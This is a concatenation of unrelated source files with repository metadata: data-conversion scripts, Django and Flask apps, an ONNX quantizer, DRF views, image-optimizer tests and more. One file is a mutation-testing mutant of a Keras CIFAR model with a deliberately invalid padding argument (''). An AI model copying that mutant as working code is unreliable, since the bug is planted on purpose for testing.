plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green'))(i), label=j)
plt.title('Logistic Regression (Test Set)')
plt.xlabel('Age')
plt.ylabel('Estimated Salary')
plt.legend()
plt.show()
if __name__ == "__main__":
main()
| [
"alex.bautista.ramos.90@gmail.com"
] | alex.bautista.ramos.90@gmail.com |
fcd62d09668e2e1f3fe8eca20e9315837789c1fd | e4f9e39ba878211e0257430376e9d69658b24d1d | /DataBase_Results_ver0.1/perform_spec2000_ncore_CINT_2csv.py | 484023f76f15277d194ba63ec8117c2e390b7666 | [] | no_license | jianxiamage/DataBase_Project | 4e8eb422dda8a1feeeec29673c877377e10a16f8 | ce4475f7d1eb9a512a4b7e60ca625ab3044f23e7 | refs/heads/master | 2021-03-11T17:11:17.568626 | 2020-03-20T06:51:49 | 2020-03-20T06:51:49 | 246,545,488 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,607 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys #引入模块
import os
import traceback
import ConfigParser
reload(sys)
sys.setdefaultencoding('utf-8')
# Keep option names case-sensitive: the stock ConfigParser lower-cases
# every key through optionxform, which would corrupt the CSV header.
class myconf(ConfigParser.ConfigParser):
    def __init__(self, defaults=None):
        # Bug fix: the original passed the literal `defaults=None` to the
        # base class, silently discarding any defaults the caller supplied.
        ConfigParser.ConfigParser.__init__(self, defaults=defaults)
    def optionxform(self, optionstr):
        # Identity transform: return the option name unchanged.
        return optionstr
# Write the section's option names to the start of the CSV file as the
# header row (note: the CSV is opened in overwrite mode, "w").
def read_iniHead(inputFile, outputFile):
    """Write the option names of section 'spec2000-ncore-CINT' of the ini
    file as the CSV header line, overwriting outputFile."""
    config = myconf()
    # Close both files deterministically; the original leaked the ini
    # handle and never closed the CSV, so the header could stay unflushed.
    with open(inputFile) as ini:
        config.readfp(ini)
    options = config.options('spec2000-ncore-CINT')
    optionStr = ','.join(options)
    print(optionStr)
    with open(outputFile, "w") as f:
        f.write(optionStr + '\n')
# Append the values of each field as one data row of the CSV file.
def read_ini(inputFile, outputFile):
    """Append the values of section 'spec2000-ncore-CINT' as one CSV row.

    Returns 0 on success, matching the caller's result_code bookkeeping.
    """
    config = myconf()
    with open(inputFile) as ini:
        config.readfp(ini)
    section = 'spec2000-ncore-CINT'
    # Bug fix: the original collected values into a plain dict and joined
    # dicts.values(); on Python 2 dict iteration order is arbitrary, so the
    # columns could come out misaligned with the header written by
    # read_iniHead.  A list preserves the exact option order.
    values = []
    for option in config.options(section):
        value = config.get(section, option)
        print(value)
        values.append(value)
    print('===============================================')
    values_Str = ','.join(values)
    print(values_Str)
    # Append mode: header was written separately by read_iniHead.
    with open(outputFile, "a") as f:
        f.write(values_Str + '\n')
    print('===============================================')
    return 0
# Entry point: write the CSV header from the first node's INI file, then
# append one data row per concurrent-node INI file.
if __name__=='__main__':
    try:
        MaxCount=3  # maximum number of concurrent nodes is 3
        iniFileName='spec2000-ncore_CINT_1.ini'
        csvFileName='spec2000-ncore_CINT.csv'
        # Write the CSV header (field names) taken from the first INI file.
        result_code = read_iniHead(iniFileName,csvFileName)
        iniFilePre = 'spec2000-ncore_CINT_'
        iniFileEnd = '.ini'
        # Iterate over all concurrent-node INI files (normally 3 of them).
        for i in range(1,MaxCount+1):
            iniFileName=iniFilePre+str(i)+iniFileEnd
            print(iniFileName)
            print('-----------------------')
            result_code = read_ini(iniFileName,csvFileName)
        # Single-file write logic (kept for reference):
        #result_code = read_ini(iniFileName,csvFileName)
        #retCode = result_code
        #print('---------------------------------')
        #print 'retCode is:%s' %(retCode)
        #print('---------------------------------')
    except Exception as E:
        # Best-effort error report; traceback printing kept disabled.
        #print('str(Exception):', str(Exception))
        print('str(e):', str(E))
        #print('repr(e):', repr(E))
        #print('traceback.print_exc(): ', traceback.print_exc())
| [
"jianxiamage@163.com"
] | jianxiamage@163.com |
239f50c79dd17cfe7a1322e937ba0f328b6160ea | 8f265edd1c8dd292b7d5163b14d8bb59087cd221 | /.history/concert/ticketSales/models_20210721234452.py | 0fd5e605d6887a05e690034190de3497687b75d7 | [] | no_license | marabpour/ConcertReservation | 8d81b89806db4838a5f833109c4a15e1303133cf | c8726c8186c392c2aa68bd08d43df20aada2727b | refs/heads/main | 2023-07-12T01:15:49.610834 | 2021-08-02T10:08:41 | 2021-08-02T10:08:41 | 391,527,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | from django.db import models
# Create your models here.
class concertModel(models.Model):
    """A concert: title, performer and duration."""
    # Concert title.
    Name=models.CharField(max_length=100)
    # Performer; also used as the string representation below.
    SingerName=models.CharField(max_length=100)
    # Duration of the concert (unit not specified here — presumably minutes;
    # TODO confirm against callers).
    length=models.IntegerField()
    def __str__(self):
        return self.SingerName
class locationModel(models.Model):
    """A venue where concerts take place."""
    # Explicit primary key supplied by the caller (not auto-generated).
    IdNumber=models.IntegerField(primary_key=True)
    # Venue name; used as the string representation below.
    Name=models.CharField(max_length=100)
    # Default address is in Persian ("Tehran - Milad Tower").
    Address=models.CharField(max_length=500,default="تهران-برج میلاد")
    # Optional phone number (11 chars fits Iranian numbers).
    Phone=models.CharField(max_length=11,null=True)
    # Total seating capacity of the venue.
    Capacity=models.IntegerField()
    def __str__(self):
        return self.Name
class timeModel(models.Model):
    """A scheduled showing: a concert at a location at a given time."""
    # PROTECT: a concert/location cannot be deleted while showings exist.
    Concert=models.ForeignKey(concertModel,on_delete=models.PROTECT)
    Location=models.ForeignKey(locationModel,on_delete=models.PROTECT)
    StartDateTime=models.DateTimeField()
    # Seats available for this particular showing (may differ from the
    # venue's total Capacity — TODO confirm intended relationship).
    Seats=models.IntegerField()
| [
"baran.arabpour@gmail.com"
] | baran.arabpour@gmail.com |
735978fe2022e5282e9cfd6f5482ac533e740fc2 | ac64fda7f1bfc92f7897efd60b8f3f0aeb22b4d7 | /syntactic_mutations/cifar/mutants/mutant28.py | 19cad1bdf036b947307a97f300c8a7c7d43b5cce | [] | no_license | dlfaults/mutation_operators_evaluation | ea7f33459ba7bcf7d70092d9db8b40f9b338d516 | 7d1ff30e901931a46bf8908e9bb05cae3daa5f0f | refs/heads/master | 2020-12-27T15:45:07.262012 | 2020-02-03T12:22:01 | 2020-02-03T12:22:01 | 237,955,342 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,822 | py | import keras
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D
from keras.datasets import cifar10
from keras.layers import Dense, Activation, Flatten, Dropout, BatchNormalization
from keras.layers import Conv2D, MaxPooling2D
def train_model(x_train, y_train, x_test, y_test, model_name):
    """Train a small VGG-style CNN on 10-class image data (CIFAR-10 layout),
    save it to ``model_name`` and return ``(test_loss, test_accuracy)``.

    NOTE(review): this file lives in a mutation-testing suite; the
    ``padding=''`` below is not a valid Keras value ('same'/'valid') and is
    the deliberately injected mutant — do not "fix" it here.
    """
    num_classes = 10
    batch_size = 32
    epochs = 25
    # One-hot encode the integer class labels.
    y_train = keras.utils.to_categorical(y_train, num_classes)
    y_test = keras.utils.to_categorical(y_test, num_classes)
    model = Sequential()
    # Block 1: two 3x3 convs (32 filters) + max-pool + dropout.
    model.add(Conv2D(32, (3, 3), padding='same', input_shape=x_train.shape[1:]))
    model.add(Activation('relu'))
    model.add(Conv2D(32, (3, 3)))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Dropout(0.25))
    # Block 2: two 3x3 convs (64 filters) + max-pool + dropout.
    model.add(Conv2D(64, (3, 3), padding=''))  # <- injected mutation (invalid padding value)
    model.add(Activation('relu'))
    model.add(Conv2D(64, (3, 3)))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Dropout(0.25))
    # Classifier head.
    model.add(Flatten())
    model.add(Dense(512))
    model.add(Activation('relu'))
    model.add(Dropout(0.5))
    model.add(Dense(num_classes))
    model.add(Activation('softmax'))
    opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-06)
    model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])
    # Scale pixel values from [0, 255] to [0, 1].
    x_train = x_train.astype('float32')
    x_test = x_test.astype('float32')
    x_train /= 255
    x_test /= 255
    model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs,
              validation_data=(x_test, y_test), shuffle=True)
    model.save(model_name)
    scores = model.evaluate(x_test, y_test, verbose=1)
    return (scores[0], scores[1])
"gunel71@gmail.com"
] | gunel71@gmail.com |
25be5ada9a19e6c17fe33f959be3ecf452cd4e8e | c8c0d3e83dbec83ccb89a751dc3e656bb482a2ce | /ZombieGame/modules/timer.py | f5e15b11ecb24d468562459b6766baa19904fa42 | [] | no_license | Yamase31/python-zombie-game | 80658bcfcb05b819265dfc75c5563391f19b1861 | dfd931ecf5caac9348b652862fc0b018979491d9 | refs/heads/main | 2023-07-07T08:58:43.314898 | 2021-08-10T00:33:36 | 2021-08-10T00:33:36 | 394,479,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | from random import randint
class Timer(object):
    """Countdown timer.

    ``counter`` starts at a random value between ``minValue`` and
    ``maxValue`` (inclusive), ticks down one step at a time, and is
    re-randomized by ``reset()``.
    """

    # Default spawn intervals for zombies and items.
    TIMER_ZOMBIE_MIN = 5
    TIMER_ZOMBIE_MAX = 10
    TIMER_ITEM_MIN = 10
    TIMER_ITEM_MAX = 15

    def __init__(self, minValue, maxValue):
        self.minValue = minValue
        self.maxValue = maxValue
        # Initialize the counter with a fresh random value.
        self.reset()

    def tick(self):
        """Advance the countdown by one step."""
        self.counter = self.counter - 1

    def isDone(self):
        """Return True once the countdown has reached zero (or below)."""
        return not self.counter > 0

    def reset(self):
        """Restart the countdown at a new random value in [min, max]."""
        self.counter = randint(self.minValue, self.maxValue)
"noreply@github.com"
] | Yamase31.noreply@github.com |
e3ac68071a6eff0398b5b8462979d4f472aa6db9 | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/abc031/D/3472289.py | 87e6ab70910a2e64fa5cbb2deb4bfa8dede46447 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 686 | py | k,n = map(int,input().split())
a = []
# Read the n (key-index string, encoded string) pairs.
# NOTE: k and n are read on the preceding line of the original file.
for i in range(n):
    x, y = input().split()
    a.append([x, y])
# Brute force: try every assignment of a substring width in {1,2,3} to each
# of the k keys, encoding the assignment as a base-3 number i in [0, 3**k).
for i in range(3**k):
    b = []
    # Decode i into per-key widths (base-3 digit + 1, so widths are 1..3).
    while i:
        c = i % 3
        b.append(c + 1)
        i = (i - c) // 3
    # Pad the remaining (high) digits with width 1.
    while len(b) < k:
        b.append(1)
    # ans[l] holds the substring deduced for key l; [None] means "unseen".
    # (The comprehension variable i shadows the loop variable but is scoped
    # to the comprehension in Python 3, so the outer loop is unaffected.)
    ans = [[None] for i in range(k)]
    flag = 0  # becomes 1 when this width assignment is inconsistent
    for j in range(n):
        kazu = a[j][0]  # digit string: sequence of key indices (1-based)
        mozi = a[j][1]  # encoded string to be consumed by the key widths
        for l in kazu:
            l = int(l) - 1
            kon = mozi[:b[l]]   # chunk consumed by key l
            mozi = mozi[b[l]:]
            if ans[l] == [None]:
                ans[l] = kon
            else:
                if ans[l] != kon:
                    # Same key maps to two different substrings: reject.
                    flag = 1
                    break
        # The encoded string must be consumed exactly.
        if mozi != "":
            flag = 1
            break
    if flag == 0:
        # First consistent assignment found: print each key's substring.
        for j in range(k):
            print(ans[j])
        exit()
"kwnafi@yahoo.com"
] | kwnafi@yahoo.com |
eb2ad42772a6494b5c6be782285061d8a6aba402 | 4520f56d4952c788e198ee7eee39911c9a76c60f | /01_Jump_to_python/0_example/6_0705/greet_user.py | f5b06332ed72e03fbd804e71a04069abccde9117 | [] | no_license | SuHyeonJung/iot_python2019 | bef8877a1cd41981ad2125291f5af44f4fd1701c | 7860630ae28c53677a3c2761c9e997b28ea55f26 | refs/heads/master | 2020-06-14T22:18:27.503781 | 2019-11-08T05:50:41 | 2019-11-08T05:50:41 | 195,142,234 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | # import sys
# # args = sys.argv[1:]
# # for i in args:
# # print("Hello,"+i.upper()[0]+i[1:]+"!")
def greet_users(usernames):
    """Print a capitalized greeting for each name in a fixed sample list.

    NOTE(review): the ``usernames`` argument is accepted but ignored — the
    greeting list is hard-coded (the module calls ``greet_users(1)`` below).
    """
    for name in ['janny', 'hannah', 'margot', 'kevin', 'min']:
        print("Hello," + name.capitalize() + "!")


greet_users(1)
| [
"galma94815@naver.com"
] | galma94815@naver.com |
02cd6046e07b44a1bc4a490c27ff00e3b0dfd1e2 | 654eafecd9c70f30100c5a2f5928880c14892b71 | /src/transmogrifier_ploneblueprints/users.py | 89fc7e63180d471679f0f0dd7fcd8d07ee5b0aca | [] | no_license | datakurre/transmogrifier_ploneblueprints | 5f6bb420d464e08a030d37d1f5c35a12de388646 | ad9c7e1ab43c4178a0ae9b3f19e6ce77183f5b16 | refs/heads/master | 2020-12-23T02:02:47.110049 | 2017-11-05T20:02:36 | 2017-11-05T20:02:36 | 28,266,208 | 0 | 2 | null | 2017-08-04T11:52:32 | 2014-12-20T12:14:40 | Python | UTF-8 | Python | false | false | 1,909 | py | # -*- coding: utf-8 -*-
from plone import api
from transmogrifier.blueprints import Blueprint
from transmogrifier.blueprints import ConditionalBlueprint
from venusianconfiguration import configure
@configure.transmogrifier.blueprint.component(name='plone.users.get')
class GetUsers(Blueprint):
    """Transmogrifier source blueprint.

    Passes every item from the previous section through unchanged, then
    yields one export item per Plone user found in ``acl_users``.
    """
    def __iter__(self):
        # First forward all items produced by the previous blueprint.
        for item in self.previous:
            yield item
        portal = api.portal.get()
        pas = portal.acl_users
        source_users = pas.source_users
        for user_id in source_users.getUserIds():
            # Reaches into private PAS plugin storage (_storage,
            # _principal_roles) — fragile across Plone versions.
            properties = pas['mutable_properties']._storage.get(user_id)
            roles = pas.portal_role_manager._principal_roles.get(user_id)
            # properties is None for default users; mark real users as
            # non-groups so the import side can tell them apart.
            if properties is not None:
                properties['isGroup'] = False
            item = {
                'id': user_id,
                'login': source_users.getLoginForUserId(user_id),
                'properties': properties,
                'roles': roles
            }
            yield item
@configure.transmogrifier.blueprint.component(name='plone.users.set')
class SetUsers(ConditionalBlueprint):
    """Transmogrifier writer blueprint.

    For each item matching the configured condition, (re)creates the user in
    ``acl_users`` and restores its roles and member properties; every item
    is passed through unchanged.
    """
    def __iter__(self):
        portal = api.portal.get()
        pas = portal.acl_users
        for item in self.previous:
            if self.condition(item):
                user_id = item['id']
                login = item['login']
                roles = item['roles']
                properties = item['properties']
                # Create the user with an empty password if it is missing.
                if user_id not in pas.source_users.getUserIds():
                    pas.source_users.addUser(user_id, login, '')
                pas.portal_role_manager.assignRolesToPrincipal(roles, user_id)
                # properties is None for default users — nothing to restore.
                if properties is not None:
                    pas.mutable_properties._storage[user_id] = properties
            yield item
| [
"asko.soukka@iki.fi"
] | asko.soukka@iki.fi |
e624861b544e31329f7b153bd528e9d585c32c92 | fb76abc1b89e14a0b7a4a1f3cf21f2d6df484df4 | /server/routes/routes_home.py | e081c5d12b9962572128797a7438414280fa4139 | [
"MIT"
] | permissive | leohmoraes/firedash | 2f6bdaca5df1be138abc5f8476f3f8dfb965d768 | 324b04615bd454b7918261eaaa9b8380597195f1 | refs/heads/master | 2020-08-06T08:31:40.010655 | 2019-06-29T21:50:19 | 2019-06-29T21:50:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | import os
from flask import render_template, Blueprint, send_from_directory, current_app
routes_home = Blueprint('home', __name__)
@routes_home.route('/', defaults={'path': ''})
@routes_home.route('/<path:path>')
def action_catch_all(path):
    """Catch-all route: serve the SPA shell (index.html) for every path so
    the front-end router can resolve it client-side."""
    return render_template('index.html')
@routes_home.route('/favicon.ico')
def action_favicon():
    """Serve the favicon from the built web-cli static directory."""
    return send_from_directory(
        # Resolved relative to the Flask app root: ../../web-cli/dist/static
        os.path.join(current_app.root_path, '..', '..', 'web-cli', 'dist', 'static'),
        'favicon.ico',
        mimetype='image/vnd.microsoft.icon'
    )
| [
"paulo@prsolucoes.com"
] | paulo@prsolucoes.com |
9b673b68addcdab5690a1057af9e25e6e234b6de | be026334d457b1f78050f8262cd693922c6c8579 | /onnxruntime/python/tools/quantization/operators/embed_layernorm.py | 1e96b7bd7508bc0adaaa3ae8d03ee0016056b10d | [
"MIT"
] | permissive | ConnectionMaster/onnxruntime | 953c34c6599c9426043a8e5cd2dba05424084e3b | bac9c0eb50ed5f0361f00707dd6434061ef6fcfe | refs/heads/master | 2023-04-05T00:01:50.750871 | 2022-03-16T15:49:42 | 2022-03-16T15:49:42 | 183,019,796 | 1 | 0 | MIT | 2023-04-04T02:03:14 | 2019-04-23T13:21:11 | C++ | UTF-8 | Python | false | false | 3,764 | py | import onnx
import logging
from .base_operator import QuantOperatorBase
from ..quant_utils import attribute_to_kwarg, ms_domain
from onnx import onnx_pb as onnx_proto
'''
Quantizes the EmbedLayerNorm fused ONNXRuntime Op.
This Quant operator keeps the input and segment IDs at int32 but will quantize all initializer and
weight inputs associated with the node to uint8.
'''
class EmbedLayerNormalizationQuant(QuantOperatorBase):
    """Quantizer for the fused ONNX Runtime EmbedLayerNormalization op.

    Keeps the int32 id/mask inputs as-is and quantizes the five float
    initializer inputs (word/position/segment embeddings, gamma, beta) to
    uint8, replacing the node with a QEmbedLayerNormalization node.
    """
    def __init__(self, onnx_quantizer, onnx_node):
        super().__init__(onnx_quantizer, onnx_node)

    def quantize(self):
        """Emit a QEmbedLayerNormalization replacement node, or fall back to
        the base-class behaviour when quantization is not applicable."""
        node = self.node
        assert (node.op_type == "EmbedLayerNormalization")

        # Nodes with a third output (e.g. embedding sum) are not supported.
        if len(node.output) > 2:
            logging.info(f"Quantization is not applied to {node.name} since it has 3 outputs")
            return super().quantize()

        '''
        Pre-quantization EmbedLayerNorm inputs:
        [0] input_ids (int32)
        [1] segment_ids (int32)
        [2] word_embedding (float32)
        [3] position_embedding (float32)
        [4] segment_embedding (float32)
        [5] gamma (float32)
        [6] beta (float32)
        [7] mask (int32) (optional)
        '''
        # Quantize only the five float inputs (indices 2..6).
        (quantized_input_names, zero_point_names, scale_names, nodes) = \
            self.quantizer.quantize_inputs(node, [2, 3, 4, 5, 6])
        if quantized_input_names is None:
            return super().quantize()

        qembed_layer_norm_name = "" if node.name == "" else node.name + "_quant"

        '''
        Quantized Input Tensor List
        [0] input_ids (int32)
        [1] segment_ids (int32)
        [2] word_embedding (uint8)
        [3] position_embedding (uint8)
        [4] segment_embedding (uint8)
        [5] gamma (uint8)
        [6] beta (uint8)
        [7] mask (int32) (optional)
        [8] word_embedding_scale (float)
        [9] position_embedding_scale (float)
        [10] segment_embedding_scale (float)
        [11] gamma_scale (float)
        [12] beta_scale (float)
        [13] word_embedding_zero_point (uint8)
        [14] position_embedding_zero_point (uint8)
        [15] segment_embedding_zero_point (uint8)
        [16] gamma_zero_point (uint8)
        [17] beta_zero_point (uint8)
        '''
        # Assemble the inputs in exactly the order documented above.
        inputs = []
        # 'input_ids'
        inputs.extend([node.input[0]])
        # 'segment_ids'
        inputs.extend([node.input[1]])
        # 'word_embedding_quant'
        inputs.extend([quantized_input_names[0]])
        # 'position_embedding_quant'
        inputs.extend([quantized_input_names[1]])
        # 'segment_embedding_quant'
        inputs.extend([quantized_input_names[2]])
        # 'gamma_quant'
        inputs.extend([quantized_input_names[3]])
        # 'beta_quant'
        inputs.extend([quantized_input_names[4]])
        # 'mask' (optional; empty string means "absent" in ONNX)
        inputs.extend([node.input[7] if len(node.input) > 7 else ""])

        # Add all scales:
        inputs.extend([scale_names[0]])
        inputs.extend([scale_names[1]])
        inputs.extend([scale_names[2]])
        inputs.extend([scale_names[3]])
        inputs.extend([scale_names[4]])

        # Add all zero points:
        inputs.extend([zero_point_names[0]])
        inputs.extend([zero_point_names[1]])
        inputs.extend([zero_point_names[2]])
        inputs.extend([zero_point_names[3]])
        inputs.extend([zero_point_names[4]])

        # Carry over the original node attributes and switch to the
        # com.microsoft domain, where QEmbedLayerNormalization lives.
        kwargs = {}
        for attribute in node.attribute:
            kwargs.update(attribute_to_kwarg(attribute))
        kwargs["domain"] = ms_domain

        qembed_layer_norm_node = onnx.helper.make_node("QEmbedLayerNormalization", inputs, node.output,
                                                       qembed_layer_norm_name, **kwargs)
        nodes.append(qembed_layer_norm_node)

        self.quantizer.new_nodes += nodes
| [
"noreply@github.com"
] | ConnectionMaster.noreply@github.com |
1df70ae22fccbeff3312dc64c4e1f42076504c0b | 5c1c6af292d91e70080b500fac0d8c0b751305f3 | /sciunit/utils.py | 3199273593f9e0c75b0852d750f973248128d2c5 | [
"MIT"
] | permissive | rgerkin/sciunit | ce3d56dc1754e03765bd3db7cad91c29b20f4260 | f0ce6ea79bd46c4500b4d79e85d40c3b1dbf8a58 | refs/heads/master | 2021-01-24T00:10:22.965603 | 2015-10-23T22:17:06 | 2015-10-23T22:17:06 | 8,079,154 | 0 | 1 | null | 2015-05-11T17:36:34 | 2013-02-07T18:48:47 | Python | UTF-8 | Python | false | false | 890 | py | """
Utility functions for SciUnit.
"""
from __future__ import print_function
from quantities.dimensionality import Dimensionality
from quantities.quantity import Quantity
# Module-level switch: printd() is silent unless this is exactly True.
PRINT_DEBUG_STATE = False  # printd does nothing by default.


def printd_set(state):
    """Enable or disable debug printing (only a literal ``True`` enables)."""
    global PRINT_DEBUG_STATE
    PRINT_DEBUG_STATE = state is True


def printd(*args, **kwargs):
    """``print`` wrapper that is a no-op unless debug printing is enabled."""
    global PRINT_DEBUG_STATE
    if not PRINT_DEBUG_STATE:
        return
    print(*args, **kwargs)
def assert_dimensionless(value):
    """
    Tests for dimensionlessness of input.
    If input is dimensionless but expressed as a Quantity, it returns the
    bare value.  If it not, it raised an error.
    """
    # NOTE(review): exact type check — Quantity subclasses are passed
    # through untouched; confirm that is intended.
    if type(value) is Quantity:
        if value.dimensionality == Dimensionality({}):
            # Unwrap the dimensionless Quantity to a plain Python scalar.
            value = value.base.item()
        else:
            raise TypeError("Score value %s must be dimensionless" % value)
    return value
"rgerkin@asu.edu"
] | rgerkin@asu.edu |
9926460214a0bc3f2d699ba6c54b7cee0beae598 | 00d40264e44a0ff6ee6871c2264faa42a3c7b132 | /quiz/G2/Aybek Addullayev/back/quizBack/api/views.py | 8aaaf374c0f3c944bd2a400284358c801ed93733 | [] | no_license | Akmaralym/WD2019Spring | 09f878fec0f9f985fd44eed758e238d7439eb361 | a2b0dab4ed2024959018a511ad64c74e5acbd152 | refs/heads/master | 2021-05-18T04:14:19.114732 | 2019-05-20T05:29:26 | 2019-05-20T05:29:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,372 | py | from django.http import HttpResponse, Http404
from rest_framework.response import Response
from rest_framework import generics, status
from rest_framework.authtoken.serializers import AuthTokenSerializer
from rest_framework.views import APIView
from rest_framework.authtoken.models import Token
from rest_framework.decorators import api_view
from rest_framework.response import Response
from api.models import Contact
from api.serializers import ContactSerializer, UserSerializer
from rest_framework.permissions import IsAuthenticated
@api_view(['POST'])
def login(request):
    """Validate username/password and return the user's DRF auth token
    (creating one on first login)."""
    serializer = AuthTokenSerializer(data=request.data)
    # Raises a 400 response on invalid credentials.
    serializer.is_valid(raise_exception=True)
    user = serializer.validated_data['user']
    token, created = Token.objects.get_or_create(user=user)
    return Response({'token': token.key})
@api_view(['POST'])
def logout(request):
    """Delete the caller's auth token, effectively logging them out."""
    request.auth.delete()
    return Response(status=status.HTTP_204_NO_CONTENT)
class ContactList(generics.ListCreateAPIView):
    """List the authenticated user's contacts (ordered by name) and create
    new contacts owned by that user."""
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        # Only the requesting user's contacts, ordered by name.
        return Contact.objects.for_user_order_by_name(self.request.user)

    def get_serializer_class(self):
        return ContactSerializer

    def perform_create(self, serializer):
        # Stamp the new contact with its creator.
        serializer.save(created_by=self.request.user)
class ContactDetail(generics.RetrieveUpdateDestroyAPIView):
    """Generic retrieve/update/delete endpoint for a single contact.

    NOTE(review): unlike ContactList this is not restricted to the owner —
    confirm whether per-user filtering is intended here.
    """
    queryset = Contact.objects.all()
    serializer_class = ContactSerializer
class ContactDetail2(APIView):
    """Hand-rolled equivalent of ContactDetail using APIView
    (GET / PUT / DELETE on a single contact)."""

    def get_object(self, pk):
        """Return the contact with primary key ``pk`` or raise Http404."""
        try:
            return Contact.objects.get(id=pk)
        except Contact.DoesNotExist:
            raise Http404

    def get(self, request, pk):
        contact = self.get_object(pk)
        serializer = ContactSerializer(contact)
        return Response(serializer.data)

    def put(self, request, pk):
        contact = self.get_object(pk)
        serializer = ContactSerializer(instance=contact, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data)
        # NOTE(review): validation failures are reported as 500; 400 Bad
        # Request would be the conventional status here.
        return Response(serializer.errors, status=status.HTTP_500_INTERNAL_SERVER_ERROR)

    def delete(self, request, pk):
        contact = self.get_object(pk)
        contact.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
| [
"bobur.muhsimbaev@gmail.com"
] | bobur.muhsimbaev@gmail.com |
d6f71e35c5fa54517d1c867a1c2d2b89274235fc | f72113a33217820b9bc16097568b041083802719 | /test/test_image.py | 1a297a9101d543c61e8cf457085a0ab9135169e8 | [
"BSD-3-Clause"
] | permissive | celestialized/yoga | 95d320446ae50e0ac3d5ac0eaf423f0aac344a19 | 67c2aff568c806a4e8c9d8ca7b875e9412e2738e | refs/heads/master | 2023-08-31T11:18:13.612232 | 2021-10-15T08:00:48 | 2021-10-15T08:00:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,883 | py | import io
import os
import pytest
from PIL import Image
import yoga.image
from yoga.image.encoders.jpeg import is_jpeg
from yoga.image.encoders.png import is_png
from yoga.image.encoders.webp import is_lossy_webp
from yoga.image.encoders.webp_lossless import is_lossless_webp
class Test_optimize(object):
    """End-to-end tests for yoga.image.optimize: input/output forms,
    output-format selection, resizing, quality and opacity options.

    All image fixtures live under test/images/.
    """

    # optimize() must accept a path, an open binary file, or a BytesIO.
    @pytest.mark.parametrize(
        "input_",
        [
            "test/images/alpha.png",
            open("test/images/alpha.png", "rb"),
            io.BytesIO(open("test/images/alpha.png", "rb").read()),
        ],
    )
    def test_input_file(self, input_):
        output = io.BytesIO()
        yoga.image.optimize(input_, output)
        output.seek(0)
        assert is_png(output.read())

    def test_output_path(self, tmpdir):
        """Output may be given as a filesystem path."""
        output_path = os.path.join(str(tmpdir), "output1.png")
        yoga.image.optimize("test/images/alpha.png", output_path)
        output = open(output_path, "rb")
        assert is_png(output.read())

    def test_output_file(self, tmpdir):
        """Output may be given as an open writable file object."""
        output_path = os.path.join(str(tmpdir), "output2.png")
        output = open(output_path, "wb")
        yoga.image.optimize("test/images/alpha.png", output)
        output.close()
        output = open(output_path, "rb")
        assert is_png(output.read())

    def test_output_bytesio(self):
        """Output may be given as an in-memory BytesIO."""
        output = io.BytesIO()
        yoga.image.optimize("test/images/alpha.png", output)
        output.seek(0)
        assert is_png(output.read())

    # Default behaviour: keep the input's format.
    @pytest.mark.parametrize(
        "image_path,format_checker",
        [
            ("test/images/image1.jpg", is_jpeg),
            ("test/images/unused-alpha.png", is_png),
            ("test/images/alpha.lossy.webp", is_lossy_webp),
            ("test/images/alpha.lossless.webp", is_lossless_webp),
        ],
    )
    def test_option_output_format_default(self, image_path, format_checker):
        output = io.BytesIO()
        yoga.image.optimize(image_path, output)
        output.seek(0)
        assert format_checker(output.read())

    # Explicit output_format values, including "auto" (picks JPEG when the
    # alpha channel is unused, PNG otherwise).
    @pytest.mark.parametrize(
        "image_path,format_,format_checker",
        [
            # fmt: off
            ("test/images/image1.jpg",           "orig",  is_jpeg),
            ("test/images/unused-alpha.png",     "orig",  is_png),
            ("test/images/alpha.png",            "auto",  is_png),
            ("test/images/unused-alpha.png",     "auto",  is_jpeg),
            ("test/images/image1.jpg",           "auto",  is_jpeg),
            ("test/images/image1.jpg",           "jpeg",  is_jpeg),
            ("test/images/unused-alpha.png",     "jpeg",  is_jpeg),
            ("test/images/image1.jpg",           "png",   is_png),
            ("test/images/unused-alpha.png",     "png",   is_png),
            ("test/images/alpha.lossy.webp",     "webp",  is_lossy_webp),
            ("test/images/alpha.lossy.webp",     "orig",  is_lossy_webp),
            ("test/images/alpha.lossless.webp",  "webpl", is_lossless_webp),
            ("test/images/alpha.lossless.webp",  "orig",  is_lossless_webp),
            # fmt: on
        ],
    )
    def test_option_output_format(self, image_path, format_, format_checker):
        output = io.BytesIO()
        yoga.image.optimize(image_path, output, {"output_format": format_})
        output.seek(0)
        assert format_checker(output.read())

    def test_option_output_format_orig_with_unsuported_output_format(self):
        """'orig' must reject input formats yoga cannot write back (GIF)."""
        output = io.BytesIO()
        with pytest.raises(ValueError):
            yoga.image.optimize(
                "test/images/image.gif", output, {"output_format": "orig"}
            )

    # Resize preserves aspect ratio and never upscales.
    @pytest.mark.parametrize(
        "image_path,options,output_image_size",
        [
            # fmt: off
            #  IMAGE                       OPTIONS              OUT IMG SIZE
            # orig
            ["test/images/image1.jpg",    {"resize": "orig"},  (256, 256)],
            # size < image
            ["test/images/image1.jpg",    {"resize": 128},     (128, 128)],
